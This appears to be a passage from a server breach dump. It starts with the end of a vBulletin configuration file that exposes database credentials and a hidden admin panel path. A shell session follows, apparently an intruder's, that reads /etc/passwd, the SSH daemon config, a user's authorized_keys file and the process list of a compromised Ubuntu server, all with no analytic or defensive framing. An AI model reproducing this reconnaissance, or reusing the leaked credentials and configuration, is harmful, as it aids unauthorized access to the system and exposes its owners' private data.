  2877. || # ---------------------------------------------------------------- # ||
  2878. || # All PHP code in this file is ©2000-2010 vBulletin Solutions Inc. # ||
  2879. || # This file may not be redistributed in whole or significant part. # ||
  2880. || # ---------------- VBULLETIN IS NOT FREE SOFTWARE ---------------- # ||
  2881. || # http://www.vbulletin.com | http://www.vbulletin.com/license.html # ||
  2882. || #################################################################### ||
  2883. \*======================================================================*/
  2884.  
  2885. /*-------------------------------------------------------*\
  2886. | ****** NOTE REGARDING THE VARIABLES IN THIS FILE ****** |
  2887. +---------------------------------------------------------+
  2888. | If you get any errors while attempting to connect to    |
  2889. | MySQL, you will need to email your webhost because we   |
  2890. | cannot tell you the correct values for the variables    |
  2891. | in this file.                                           |
  2892. \*-------------------------------------------------------*/
  2893.  
  2894.         //      ****** DATABASE TYPE ******
  2895.         //      This is the type of the database server on which your vBulletin database will be located.
  2896.         //      Valid options are mysql and mysqli, for slave support add _slave.  Try to use mysqli if you are using PHP 5 and MySQL 4.1+
  2898.         // for slave options just append _slave to your preferred database type.
  2899. $config['Database']['dbtype'] = 'mysql';
  2900.  
  2901.         //      ****** DATABASE NAME ******
  2902.         //      This is the name of the database where your vBulletin will be located.
  2903.         //      This must be created by your webhost.
  2904. $config['Database']['dbname'] = 'edbforum';
  2905.  
  2906.         //      ****** TABLE PREFIX ******
  2907.         //      Prefix that your vBulletin tables have in the database.
  2908. $config['Database']['tableprefix'] = '';
  2909.  
  2910.         //      ****** TECHNICAL EMAIL ADDRESS ******
  2911.         //      If any database errors occur, they will be emailed to the address specified here.
  2912.         //      Leave this blank to not send any emails when there is a database error.
  2913. $config['Database']['technicalemail'] = 'dbmaster@example.com';
  2914.  
  2915.         //      ****** FORCE EMPTY SQL MODE ******
  2916.         // New versions of MySQL (4.1+) have introduced some behaviors that are
  2917.         // incompatible with vBulletin. Setting this value to "true" disables those
  2918.         // behaviors. You only need to modify this value if vBulletin recommends it.
  2919. $config['Database']['force_sql_mode'] = false;
  2920.  
  2921.  
  2922.  
  2923.         //      ****** MASTER DATABASE SERVER NAME AND PORT ******
  2924.         //      This is the hostname or IP address and port of the database server.
  2925.         //      If you are unsure of what to put here, leave the default values.
  2926.         //
  2927.         //      Note: If you are using IIS 7+ and MySQL is on the same machine, you
  2928.         //      need to use 127.0.0.1 instead of localhost
  2929. $config['MasterServer']['servername'] = 'localhost';
  2930. $config['MasterServer']['port'] = 3306;
  2931.  
  2932.         //      ****** MASTER DATABASE USERNAME & PASSWORD ******
  2933.         //      This is the username and password you use to access MySQL.
  2934.         //      These must be obtained through your webhost.
  2935. $config['MasterServer']['username'] = 'forums';
  2936. $config['MasterServer']['password'] = '2834725234523472342';
  2937.  
  2938.         //      ****** MASTER DATABASE PERSISTENT CONNECTIONS ******
  2939.         //      This option allows you to turn persistent connections to MySQL on or off.
  2940.         //      The difference in performance is negligible for all but the largest boards.
  2941.         //      If you are unsure what this should be, leave it off. (0 = off; 1 = on)
  2942. $config['MasterServer']['usepconnect'] = 0;
  2943.  
  2944.  
  2945.  
  2946.         //      ****** SLAVE DATABASE CONFIGURATION ******
  2947.         //      If you have multiple database backends, this is the information for your slave
  2948.         //      server. If you are not 100% sure you need to fill in this information,
  2949.         //      do not change any of the values here.
  2950. $config['SlaveServer']['servername'] = '';
  2951. $config['SlaveServer']['port'] = 3306;
  2952. $config['SlaveServer']['username'] = '';
  2953. $config['SlaveServer']['password'] = '';
  2954. $config['SlaveServer']['usepconnect'] = 0;
  2955.  
  2956.  
  2957.  
  2958.         //      ****** PATH TO ADMIN & MODERATOR CONTROL PANELS ******
  2959.         //      This setting allows you to change the name of the folders that the admin and
  2960.         //      moderator control panels reside in. You may wish to do this for security purposes.
  2961.         //      Please note that if you change the name of the directory here, you will still need
  2962.         //      to manually change the name of the directory on the server.
  2963. $config['Misc']['admincpdir'] = 'admincp-23987239874298273987234';
  2964. $config['Misc']['modcpdir'] = 'modcp-23987239874298273987234';
  2965.  
  2966.         //      Prefix that all vBulletin cookies will have
  2967.         //      Keep this short and only use numbers and letters, i.e. 1-9 and a-Z
  2968. $config['Misc']['cookieprefix'] = 'bb';
  2969.  
  2970.         //      ******** FULL PATH TO FORUMS DIRECTORY ******
  2971.         //      On a few systems it may be necessary to input the full path to your forums directory
  2972.         //      for vBulletin to function normally. You can ignore this setting unless vBulletin
  2973.         //      tells you to fill this in. Do not include a trailing slash!
  2974.         //      Example Unix:
  2975.         //        $config['Misc']['forumpath'] = '/home/users/public_html/forums';
  2976.         //      Example Win32:
  2977.         //        $config['Misc']['forumpath'] = 'c:\program files\apache group\apache\htdocs\vb3';
  2978. $config['Misc']['forumpath'] = '';
  2979.  
  2980.  
  2981.  
  2982.         //      ****** USERS WITH ADMIN LOG VIEWING PERMISSIONS ******
  2983.         //      The users specified here will be allowed to view the admin log in the control panel.
  2984.         //      Users must be specified by *ID number* here. To obtain a user's ID number,
  2985.         //      view their profile via the control panel. If this is a new installation, leave
  2986.         //      the first user created will have a user ID of 1. Seperate each userid with a comma.
  2987. $config['SpecialUsers']['canviewadminlog'] = '1';
  2988.  
  2989.         //      ****** USERS WITH ADMIN LOG PRUNING PERMISSIONS ******
  2990.         //      The users specified here will be allowed to remove ("prune") entries from the admin
  2991.         //      log. See the above entry for more information on the format.
  2992. $config['SpecialUsers']['canpruneadminlog'] = '1';
  2993.  
  2994.         //      ****** USERS WITH QUERY RUNNING PERMISSIONS ******
  2995.         //      The users specified here will be allowed to run queries from the control panel.
  2996.         //      See the above entries for more information on the format.
  2997.         //      Please note that the ability to run queries is quite powerful. You may wish
  2998.         //      to remove all user IDs from this list for security reasons.
  2999. $config['SpecialUsers']['canrunqueries'] = '';
  3000.  
  3001.         //      ****** UNDELETABLE / UNALTERABLE USERS ******
  3002.         //      The users specified here will not be deletable or alterable from the control panel by any users.
  3003.         //      To specify more than one user, separate userids with commas.
  3004. $config['SpecialUsers']['undeletableusers'] = '';
  3005.  
  3006.         //      ****** SUPER ADMINISTRATORS ******
  3007.         //      The users specified below will have permission to access the administrator permissions
  3008.         //      page, which controls the permissions of other administrators
  3009. $config['SpecialUsers']['superadministrators'] = '1';
  3010.  
  3011.         // ****** DATASTORE CACHE CONFIGURATION *****
  3012.         // Here you can configure different methods for caching datastore items.
  3013.         // vB_Datastore_Filecache  - to use includes/datastore/datastore_cache.php
  3014.         // vB_Datastore_APC - to use APC
  3015.         // vB_Datastore_XCache - to use XCache
  3016.         // vB_Datastore_Memcached - to use a Memcache server, more configuration below
  3017. // $config['Datastore']['class'] = 'vB_Datastore_Filecache';
  3018.  
  3019.         // ******** DATASTORE PREFIX ******
  3020.         // If you are using a PHP Caching system (APC, XCache, eAccelerator) with more
  3021.         // than one set of forums installed on your host, you *may* need to use a prefix
  3022.         // so that they do not try to use the same variable within the cache.
  3023.         // This works in a similar manner to the database table prefix.
  3024. // $config['Datastore']['prefix'] = '';
  3025.  
  3026.         // It is also necessary to specify the hostname or IP address and the port the server is listening on
  3027. /*
  3028. $config['Datastore']['class'] = 'vB_Datastore_Memcached';
  3029. $i = 0;
  3030. // First Server
  3031. $i++;
  3032. $config['Misc']['memcacheserver'][$i]           = '127.0.0.1';
  3033. $config['Misc']['memcacheport'][$i]                     = 11211;
  3034. $config['Misc']['memcachepersistent'][$i]       = true;
  3035. $config['Misc']['memcacheweight'][$i]           = 1;
  3036. $config['Misc']['memcachetimeout'][$i]          = 1;
  3037. $config['Misc']['memcacheretry_interval'][$i] = 15;
  3038. */
  3039.  
  3040. // ****** The following options are only needed in special cases ******
  3041.  
  3042.         //      ****** MySQLI OPTIONS *****
  3043.         // When using MySQL 4.1+, MySQLi should be used to connect to the database.
  3044.         // If you need to set the default connection charset because your database
  3045.         // is using a charset other than latin1, you can set the charset here.
  3046.         // If you don't set the charset to be the same as your database, you
  3047.         // may receive collation errors.  Ignore this setting unless you
  3048.         // are sure you need to use it.
  3049. // $config['Mysqli']['charset'] = 'utf8';
  3050.  
  3051.         //      Optionally, PHP can be instructed to set connection parameters by reading from the
  3052.         //      file named in 'ini_file'. Please use a full path to the file.
  3053.         //      Example:
  3054.         //      $config['Mysqli']['ini_file'] = 'c:\program files\MySQL\MySQL Server 4.1\my.ini';
  3055. $config['Mysqli']['ini_file'] = '';
  3056.  
  3057. // Image Processing Options
  3058.         // Images that exceed either dimension below will not be resized by vBulletin. If you need to resize larger images, alter these settings.
  3060. $config['Misc']['maxwidth'] = 2592;
  3061. $config['Misc']['maxheight'] = 1944;
  3062.  
  3063. /*======================================================================*\
  3064. || ####################################################################
  3065. || # Downloaded: 10:22, Sat Nov 6th 2010
  3066. || # CVS: $RCSfile$ - $Revision: 39199 $
  3067. || ####################################################################
  3068. \*======================================================================*/
  3069.  
  3070. $ cd /
  3071.  
  3072. $ ls -la
  3073. total 112
  3074. drwxr-xr-x  26 root root  4096 Nov 30 06:53 .
  3075. drwxr-xr-x  26 root root  4096 Nov 30 06:53 ..
  3076. drw-------   2 root root  4096 Dec  4 03:45 backup
  3077. drw-------   2 root root  4096 Sep  1 07:38 backup-fix
  3078. drwxr-xr-x   2 root root  4096 Oct 11 09:00 bin
  3079. drwxr-xr-x   3 root root  4096 Nov 30 06:53 boot
  3080. drwxr-xr-x   3 root root  4096 Nov 11 16:56 build
  3081. drwxr-xr-x   2 root root  4096 Jul  9 05:29 cdrom
  3082. drwxr-xr-x  14 root root  3800 Nov 30 06:53 dev
  3083. drwxr-xr-x  91 root root  4096 Dec  2 06:34 etc
  3084. drwxr-xr-x   3 root root  4096 Aug  3 11:48 home
  3085. lrwxrwxrwx   1 root root    32 Nov 30 06:53 initrd.img -> boot/initrd.img-2.6.32-26-server
  3086. lrwxrwxrwx   1 root root    32 Oct  4 16:30 initrd.img.old -> boot/initrd.img-2.6.32-25-server
  3087. drwxr-xr-x  13 root root 12288 Nov 18 06:54 lib
  3088. lrwxrwxrwx   1 root root     4 Jul  9 05:28 lib64 -> /lib
  3089. drwx------   2 root root 16384 Jul  9 05:28 lost+found
  3090. drwxr-xr-x   2 root root  4096 Jul  9 15:17 maint
  3091. drwxr-xr-x   3 root root  4096 Jul  9 05:28 media
  3092. drwxr-xr-x   4 root root  4096 Jul  9 20:03 mnt
  3093. drwxr-xr-x   3 root root  4096 Oct  7 16:53 opt
  3094. dr-xr-xr-x 227 root root     0 Nov 11 10:45 proc
  3095. drwx------   9 root root  4096 Nov 25 09:08 root
  3096. drwxr-xr-x   2 root root  4096 Oct 29 19:00 sbin
  3097. drwxr-xr-x   2 root root  4096 Dec  5  2009 selinux
  3098. drwxr-xr-x   2 root root  4096 Jul  9 05:28 srv
  3099. drwxr-xr-x  13 root root     0 Nov 11 10:45 sys
  3100. drwxrwxrwt   3 root root  4096 Dec  4 14:59 tmp
  3101. drwxr-xr-x  10 root root  4096 Jul  9 05:28 usr
  3102. drwxr-xr-x  19 root root  4096 Sep 24 09:26 var
  3103. lrwxrwxrwx   1 root root    29 Nov 30 06:53 vmlinuz -> boot/vmlinuz-2.6.32-26-server
  3104. lrwxrwxrwx   1 root root    29 Oct  4 16:30 vmlinuz.old -> boot/vmlinuz-2.6.32-25-server
  3105.  
  3106. $ cat /etc/passwd
  3107. root:x:0:0:root:/root:/bin/bash
  3108. daemon:x:1:1:daemon:/usr/sbin:/bin/sh
  3109. bin:x:2:2:bin:/bin:/bin/sh
  3110. sys:x:3:3:sys:/dev:/bin/sh
  3111. sync:x:4:65534:sync:/bin:/bin/sync
  3112. games:x:5:60:games:/usr/games:/bin/sh
  3113. man:x:6:12:man:/var/cache/man:/bin/sh
  3114. lp:x:7:7:lp:/var/spool/lpd:/bin/sh
  3115. mail:x:8:8:mail:/var/mail:/bin/sh
  3116. news:x:9:9:news:/var/spool/news:/bin/sh
  3117. uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
  3118. proxy:x:13:13:proxy:/bin:/bin/sh
  3119. www-data:x:33:33:www-data:/var/www:/bin/sh
  3120. backup:x:34:34:backup:/var/backups:/bin/sh
  3121. list:x:38:38:Mailing List Manager:/var/list:/bin/sh
  3122. irc:x:39:39:ircd:/var/run/ircd:/bin/sh
  3123. gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
  3124. nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
  3125. libuuid:x:100:101::/var/lib/libuuid:/bin/sh
  3126. syslog:x:101:103::/home/syslog:/bin/false
  3127. sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
  3128. landscape:x:103:108::/var/lib/landscape:/bin/false
  3129. mysql:x:104:112:MySQL Server,,,:/var/lib/mysql:/bin/false
  3130. smmta:x:105:114:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
  3131. smmsp:x:106:115:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
  3132. emgent:x:1003:1002:,,,:/home/emgent:/bin/bash
  3133. ossec:x:1004:1003::/var/ossec:/bin/false
  3134. ossecm:x:1005:1003::/var/ossec:/bin/false
  3135. ossecr:x:1006:1003::/var/ossec:/bin/false
  3136.  
  3137. $ cat /etc/issue
  3138. Ubuntu 10.04.1 LTS \n \l
  3139.  
  3140.  
  3141. $ cat /etc/ssh/sshd_config
  3142. # Package generated configuration file
  3143. # See the sshd_config(5) manpage for details
  3144.  
  3145. # What ports, IPs and protocols we listen for
  3146. Port 22
  3147. # Use these options to restrict which interfaces/protocols sshd will bind to
  3148. #ListenAddress ::
  3149. #ListenAddress 0.0.0.0
  3150. Protocol 2
  3151. # HostKeys for protocol version 2
  3152. HostKey /etc/ssh/ssh_host_rsa_key
  3153. HostKey /etc/ssh/ssh_host_dsa_key
  3154. #Privilege Separation is turned on for security
  3155. UsePrivilegeSeparation yes
  3156.  
  3157. # Lifetime and size of ephemeral version 1 server key
  3158. KeyRegenerationInterval 3600
  3159. ServerKeyBits 768
  3160.  
  3161. # Logging
  3162. SyslogFacility AUTH
  3163. LogLevel INFO
  3164.  
  3165. # Authentication:
  3166. LoginGraceTime 120
  3167. PermitRootLogin yes
  3168. StrictModes yes
  3169.  
  3170. RSAAuthentication yes
  3171. PubkeyAuthentication yes
  3172. #AuthorizedKeysFile     %h/.ssh/authorized_keys
  3173.  
  3174. # Don't read the user's ~/.rhosts and ~/.shosts files
  3175. IgnoreRhosts yes
  3176. # For this to work you will also need host keys in /etc/ssh_known_hosts
  3177. RhostsRSAAuthentication no
  3178. # similar for protocol version 2
  3179. HostbasedAuthentication no
  3180. # Uncomment if you don't trust ~/.ssh/known_hosts for RhostsRSAAuthentication
  3181. #IgnoreUserKnownHosts yes
  3182.  
  3183. # To enable empty passwords, change to yes (NOT RECOMMENDED)
  3184. PermitEmptyPasswords no
  3185.  
  3186. # Change to yes to enable challenge-response passwords (beware issues with
  3187. # some PAM modules and threads)
  3188. ChallengeResponseAuthentication no
  3189.  
  3190. # Change to no to disable tunnelled clear text passwords
  3191. PasswordAuthentication yes
  3192.  
  3193. # Kerberos options
  3194. #KerberosAuthentication no
  3195. #KerberosGetAFSToken no
  3196. #KerberosOrLocalPasswd yes
  3197. #KerberosTicketCleanup yes
  3198.  
  3199. # GSSAPI options
  3200. #GSSAPIAuthentication no
  3201. #GSSAPICleanupCredentials yes
  3202.  
  3203. X11Forwarding yes
  3204. X11DisplayOffset 10
  3205. PrintMotd no
  3206. PrintLastLog yes
  3207. TCPKeepAlive yes
  3208. #UseLogin no
  3209.  
  3210. #MaxStartups 10:30:60
  3211. #Banner /etc/issue.net
  3212.  
  3213. # Allow client to pass locale environment variables
  3214. AcceptEnv LANG LC_*
  3215.  
  3216. Subsystem sftp /usr/lib/openssh/sftp-server
  3217.  
  3218. # Set this to 'yes' to enable PAM authentication, account processing,
  3219. # and session processing. If this is enabled, PAM authentication will
  3220. # be allowed through the ChallengeResponseAuthentication and
  3221. # PasswordAuthentication.  Depending on your PAM configuration,
  3222. # PAM authentication via ChallengeResponseAuthentication may bypass
  3223. # the setting of "PermitRootLogin without-password".
  3224. # If you just want the PAM account and session checks to run without
  3225. # PAM authentication, then enable this but set PasswordAuthentication
  3226. # and ChallengeResponseAuthentication to 'no'.
  3227. UsePAM yes
  3228.  
  3229. $ cd /home
  3230.  
  3231. $ ls -la
  3232. total 12
  3233. drwxr-xr-x  3 root   root   4096 Aug  3 11:48 .
  3234. drwxr-xr-x 26 root   root   4096 Nov 30 06:53 ..
  3235. drwxr-xr-x  7 emgent emgent 4096 Aug  7 07:45 emgent
  3236.  
  3237. $ cd emgent
  3238.  
  3239. $ ls -la
  3240. total 48
  3241. drwxr-xr-x 7 emgent emgent 4096 Aug  7 07:45 .
  3242. drwxr-xr-x 3 root   root   4096 Aug  3 11:48 ..
  3243. -rw------- 1 emgent emgent  259 Oct 18 11:39 .bash_history
  3244. -rw-r--r-- 1 emgent emgent  220 Aug  3 11:48 .bash_logout
  3245. -rw-r--r-- 1 emgent emgent 3103 Aug  3 11:48 .bashrc
  3246. drwx------ 2 emgent emgent 4096 Aug  3 11:49 .cache
  3247. drwx------ 2 emgent emgent 4096 Aug  3 11:49 .irssi
  3248. -rw------- 1 emgent emgent    9 Aug  3 11:50 .nano_history
  3249. -rw-r--r-- 1 emgent emgent  675 Aug  3 11:48 .profile
  3250. drwxr-xr-x 2 emgent emgent 4096 Aug  3 11:49 .ssh
  3251. drwxr-xr-x 3 emgent emgent 4096 Aug  7 07:45 .subversion
  3252. drwxr-xr-x 4 emgent emgent 4096 Aug  7 07:46 exploitdb
  3253.  
  3254.  
  3255.  
  3256. $ cd .ssh
  3257.  
  3258. $ ls
  3259. authorized_keys
  3260. $ cat authorized_keys
  3261. ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAntXlep19oECqVocmK6UIhsxI5yGQSPUVYWOZXWO7Q0wP9vF5FfHmE4yCmKt+MleWcPWkkbI6IXBt9TNtw7m6usPx2IEbpEVr8sl7pT8hiW8tKNew74gEEgE53AGLhWr/+vViL+5K4SKCt591oABDtWA6KIEOuyx9/jqLLwBTQP0UyrqIJpR9VhQ2GQ6tN6Y+LV4tvpqy8ehevsIqdj+HvdsvVU2sREJsSH5xAncaRJQ1sfQepyeAwi7yZ1fBT4U4/LlukkBLIqjXk2D6jPZG870R4KCEI280rBJ9DX4fPX9qvYUwOm/OtWwxC7kivuCnNM1v2wBRUVCBmSUimqWnpQ== emgent@enJoy
  3262.  
  3263. $ ps aux
  3264. USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
  3265. root         1  0.0  0.0  23680  1244 ?        Ss   Nov11   0:07 /sbin/init
  3266. root         2  0.0  0.0      0     0 ?        S    Nov11   0:00 [kthreadd]
  3267. root         3  0.0  0.0      0     0 ?        S    Nov11   0:01 [migration/0]
  3268. root         4  0.0  0.0      0     0 ?        S    Nov11   0:12 [ksoftirqd/0]
  3269. root         5  0.0  0.0      0     0 ?        S    Nov11   0:00 [watchdog/0]
  3270. root         6  0.0  0.0      0     0 ?        S    Nov11   0:02 [migration/1]
  3271. root         7  0.0  0.0      0     0 ?        S    Nov11   0:04 [ksoftirqd/1]
  3272. root         8  0.0  0.0      0     0 ?        S    Nov11   0:00 [watchdog/1]
  3273. root         9  0.0  0.0      0     0 ?        S    Nov11   0:02 [migration/2]
  3274. root        10  0.0  0.0      0     0 ?        S    Nov11   0:02 [ksoftirqd/2]
  3275. root        11  0.0  0.0      0     0 ?        S    Nov11   0:00 [watchdog/2]
  3276. root        12  0.0  0.0      0     0 ?        S    Nov11   0:01 [migration/3]
  3277. root        13  0.0  0.0      0     0 ?        S    Nov11   0:05 [ksoftirqd/3]
  3278. root        14  0.0  0.0      0     0 ?        S    Nov11   0:00 [watchdog/3]
  3279. root        15  0.0  0.0      0     0 ?        S    Nov11   0:32 [events/0]
  3280. root        16  0.0  0.0      0     0 ?        S    Nov11  13:44 [events/1]
  3281. root        17  0.0  0.0      0     0 ?        S    Nov11   0:17 [events/2]
  3282. root        18  0.0  0.0      0     0 ?        S    Nov11   0:18 [events/3]
  3283. root        19  0.0  0.0      0     0 ?        S    Nov11   0:00 [cpuset]
  3284. root        20  0.0  0.0      0     0 ?        S    Nov11   0:00 [khelper]
  3285. root        21  0.0  0.0      0     0 ?        S    Nov11   0:00 [netns]
  3286. root        22  0.0  0.0      0     0 ?        S    Nov11   0:00 [async/mgr]
  3287. root        23  0.0  0.0      0     0 ?        S    Nov11   0:00 [pm]
  3288. root        25  0.0  0.0      0     0 ?        S    Nov11   0:02 [sync_supers]
  3289. root        26  0.0  0.0      0     0 ?        S    Nov11   0:04 [bdi-default]
  3290. root        27  0.0  0.0      0     0 ?        S    Nov11   0:00 [kintegrityd/0]
  3291. root        28  0.0  0.0      0     0 ?        S    Nov11   0:00 [kintegrityd/1]
  3292. root        29  0.0  0.0      0     0 ?        S    Nov11   0:00 [kintegrityd/2]
  3293. root        30  0.0  0.0      0     0 ?        S    Nov11   0:00 [kintegrityd/3]
  3294. root        31  0.0  0.0      0     0 ?        S    Nov11  11:09 [kblockd/0]
  3295. root        32  0.0  0.0      0     0 ?        S    Nov11   2:17 [kblockd/1]
  3296. root        33  0.0  0.0      0     0 ?        S    Nov11   1:33 [kblockd/2]
  3297. root        34  0.0  0.0      0     0 ?        S    Nov11   1:14 [kblockd/3]
  3298. root        35  0.0  0.0      0     0 ?        S    Nov11   0:00 [kacpid]
  3299. root        36  0.0  0.0      0     0 ?        S    Nov11   0:00 [kacpi_notify]
  3300. root        37  0.0  0.0      0     0 ?        S    Nov11   0:00 [kacpi_hotplug]
  3301. root        38  0.0  0.0      0     0 ?        S    Nov11   0:00 [ata/0]
  3302. root        39  0.0  0.0      0     0 ?        S    Nov11   0:00 [ata/1]
  3303. root        40  0.0  0.0      0     0 ?        S    Nov11   0:00 [ata/2]
  3304. root        41  0.0  0.0      0     0 ?        S    Nov11   0:00 [ata/3]
  3305. root        42  0.0  0.0      0     0 ?        S    Nov11   0:00 [ata_aux]
  3306. root        43  0.0  0.0      0     0 ?        S    Nov11   0:00 [ksuspend_usbd]
  3307. root        44  0.0  0.0      0     0 ?        S    Nov11   0:00 [khubd]
  3308. root        45  0.0  0.0      0     0 ?        S    Nov11   0:00 [kseriod]
  3309. root        46  0.0  0.0      0     0 ?        S    Nov11   0:00 [kmmcd]
  3310. root        51  0.0  0.0      0     0 ?        S    Nov11   0:00 [khungtaskd]
  3311. root        52  0.0  0.0      0     0 ?        S    Nov11   0:30 [kswapd0]
  3312. root        53  0.0  0.0      0     0 ?        SN   Nov11   0:00 [ksmd]
  3313. root        54  0.0  0.0      0     0 ?        S    Nov11   0:00 [aio/0]
  3314. root        55  0.0  0.0      0     0 ?        S    Nov11   0:00 [aio/1]
  3315. root        56  0.0  0.0      0     0 ?        S    Nov11   0:00 [aio/2]
  3316. root        57  0.0  0.0      0     0 ?        S    Nov11   0:00 [aio/3]
  3317. root        58  0.0  0.0      0     0 ?        S    Nov11   0:00 [ecryptfs-kthrea]
  3318. root        59  0.0  0.0      0     0 ?        S    Nov11   0:00 [crypto/0]
  3319. root        60  0.0  0.0      0     0 ?        S    Nov11   0:00 [crypto/1]
  3320. root        61  0.0  0.0      0     0 ?        S    Nov11   0:00 [crypto/2]
  3321. root        62  0.0  0.0      0     0 ?        S    Nov11   0:00 [crypto/3]
  3322. root        65  0.0  0.0      0     0 ?        S    Nov11   0:00 [pciehpd]
  3323. root        66  0.0  0.0      0     0 ?        S    Nov11   0:00 [scsi_eh_0]
  3324. root        67  0.0  0.0      0     0 ?        S    Nov11   0:00 [scsi_eh_1]
  3325. root        69  0.0  0.0      0     0 ?        S    Nov11   0:00 [kstriped]
  3326. root        70  0.0  0.0      0     0 ?        S    Nov11   0:00 [kmpathd/0]
  3327. root        71  0.0  0.0      0     0 ?        S    Nov11   0:00 [kmpathd/1]
  3328. root        72  0.0  0.0      0     0 ?        S    Nov11   0:00 [kmpathd/2]
  3329. root        73  0.0  0.0      0     0 ?        S    Nov11   0:00 [kmpathd/3]
  3330. root        74  0.0  0.0      0     0 ?        S    Nov11   0:00 [kmpath_handlerd]
  3331. root        75  0.0  0.0      0     0 ?        S    Nov11   0:00 [ksnapd]
  3332. root        76  0.0  0.0      0     0 ?        S    Nov11   0:00 [kondemand/0]
  3333. root        77  0.0  0.0      0     0 ?        S    Nov11   0:00 [kondemand/1]
  3334. root        78  0.0  0.0      0     0 ?        S    Nov11   0:00 [kondemand/2]
  3335. root        79  0.0  0.0      0     0 ?        S    Nov11   0:00 [kondemand/3]
  3336. root        80  0.0  0.0      0     0 ?        S    Nov11   0:00 [kconservative/0]
  3337. root        81  0.0  0.0      0     0 ?        S    Nov11   0:00 [kconservative/1]
  3338. root        82  0.0  0.0      0     0 ?        S    Nov11   0:00 [kconservative/2]
  3339. root        83  0.0  0.0      0     0 ?        S    Nov11   0:00 [kconservative/3]
  3340. root       191  0.0  0.0      0     0 ?        S    Nov11   1:03 [mpt_poll_0]
  3341. root       192  0.0  0.0      0     0 ?        S    Nov11   0:00 [mpt/0]
  3342. root       268  0.0  0.0      0     0 ?        S    Nov11   0:00 [scsi_eh_2]
  3343. root       285  0.3  0.0      0     0 ?        S    Nov11 125:09 [jbd2/sda1-8]
  3344. root       286  0.0  0.0      0     0 ?        S    Nov11   0:00 [ext4-dio-unwrit]
  3345. root       287  0.0  0.0      0     0 ?        S    Nov11   0:00 [ext4-dio-unwrit]
  3346. root       288  0.0  0.0      0     0 ?        S    Nov11   0:00 [ext4-dio-unwrit]
  3347. root       289  0.0  0.0      0     0 ?        S    Nov11   0:00 [ext4-dio-unwrit]
  3348. root       322  0.3  0.0      0     0 ?        S    Nov11 115:40 [flush-8:0]
  3349. root       347  0.0  0.0  16904   640 ?        S    Nov11   0:00 upstart-udev-bridge --daemon
  3350. root       363  0.0  0.0  16920   416 ?        S<s  Nov11   0:00 udevd --daemon
  3351. root       582  0.0  0.0      0     0 ?        S    Nov11   0:00 [kpsmoused]
  3352. syslog     714  0.0  0.0 191492  1148 ?        Sl   Nov11   3:22 rsyslogd -c4
  3353. root       732  0.0  0.0  49260   528 ?        Ss   Nov11   0:01 /usr/sbin/sshd
  3354. root       773  0.0  0.0   6080   284 tty4     Ss+  Nov11   0:00 /sbin/getty -8 38400 tty4
  3355. root       777  0.0  0.0   6080   284 tty5     Ss+  Nov11   0:00 /sbin/getty -8 38400 tty5
  3356. root       787  0.0  0.0   6080   284 tty2     Ss+  Nov11   0:00 /sbin/getty -8 38400 tty2
  3357. root       788  0.0  0.0   6080   284 tty3     Ss+  Nov11   0:00 /sbin/getty -8 38400 tty3
  3358. root       792  0.0  0.0   6080   284 tty6     Ss+  Nov11   0:00 /sbin/getty -8 38400 tty6
  3359. root       806  0.0  0.0  21076   428 ?        Ss   Nov11   0:07 cron
  3360. daemon     807  0.0  0.0  18884   348 ?        Ss   Nov11   0:00 atd
  3361. root       817  0.0  0.0  11284   428 ?        Ss   Nov11   1:53 /usr/sbin/irqbalance
  3362. root       950  0.0  0.0  84384   848 ?        Ss   Nov11   1:24 sendmail: MTA: accepting connections
  3363. root      1318  0.0  0.0  53108  4076 ?        Sl   Nov11   7:28 /usr/bin/python /usr/bin/fail2ban-server -b -s /var/run/fail2ban/fail2ban.sock
  3364. root      1354  0.0  0.0  97040   408 ?        Ss   Nov11   0:07 /usr/bin/svnserve -d -r /var/svn/
  3365. root      1357  0.0  0.0   6080   284 tty1     Ss+  Nov11   0:00 /sbin/getty -8 38400 tty1
  3366. root      3467  0.0  0.0      0     0 ?        S    Nov30   0:00 [xfs_mru_cache]
  3367. root      3468  0.0  0.0      0     0 ?        S    Nov30   0:00 [xfslogd/0]
  3368. root      3469  0.0  0.0      0     0 ?        S    Nov30   0:00 [xfslogd/1]
  3369. root      3470  0.0  0.0      0     0 ?        S    Nov30   0:00 [xfslogd/2]
  3370. root      3471  0.0  0.0      0     0 ?        S    Nov30   0:00 [xfslogd/3]
  3371. root      3472  0.0  0.0      0     0 ?        S    Nov30   0:00 [xfsdatad/0]
  3372. root      3473  0.0  0.0      0     0 ?        S    Nov30   0:00 [xfsdatad/1]
  3373. root      3474  0.0  0.0      0     0 ?        S    Nov30   0:00 [xfsdatad/2]
  3374. root      3475  0.0  0.0      0     0 ?        S    Nov30   0:00 [xfsdatad/3]
  3375. root      3476  0.0  0.0      0     0 ?        S    Nov30   0:00 [xfsconvertd/0]
  3376. root      3477  0.0  0.0      0     0 ?        S    Nov30   0:00 [xfsconvertd/1]
  3377. root      3478  0.0  0.0      0     0 ?        S    Nov30   0:00 [xfsconvertd/2]
  3378. root      3479  0.0  0.0      0     0 ?        S    Nov30   0:00 [xfsconvertd/3]
  3379. root      3489  0.0  0.0  16980   372 ?        S<   Nov30   0:00 udevd --daemon
  3380. root      3490  0.0  0.0  16980   376 ?        S<   Nov30   0:00 udevd --daemon
  3381. root      3491  0.0  0.0      0     0 ?        S    Nov30   0:00 [jfsIO]
  3382. root      3492  0.0  0.0      0     0 ?        S    Nov30   0:00 [jfsCommit]
  3383. root      3493  0.0  0.0      0     0 ?        S    Nov30   0:00 [jfsCommit]
  3384. root      3494  0.0  0.0      0     0 ?        S    Nov30   0:00 [jfsCommit]
  3385. root      3495  0.0  0.0      0     0 ?        S    Nov30   0:00 [jfsCommit]
  3386. root      3496  0.0  0.0      0     0 ?        S    Nov30   0:00 [jfsSync]
  3387. root      4114  0.0  0.0 107552  1928 ?        S    Nov23   0:00 /usr/bin/svnserve -d -r /var/svn/
  3388. root      7702  0.0  0.0 107420  1960 ?        S    13:31   0:00 /usr/bin/svnserve -d -r /var/svn/
  3389. root      8080  0.1  0.1 346236 11548 ?        Ss   Nov26  18:14 /usr/sbin/apache2 -k start
  3390. root      9853  0.0  0.0   9756   384 ?        Ss   Nov11   1:04 tail -f /var/log/apache2/jesys.log
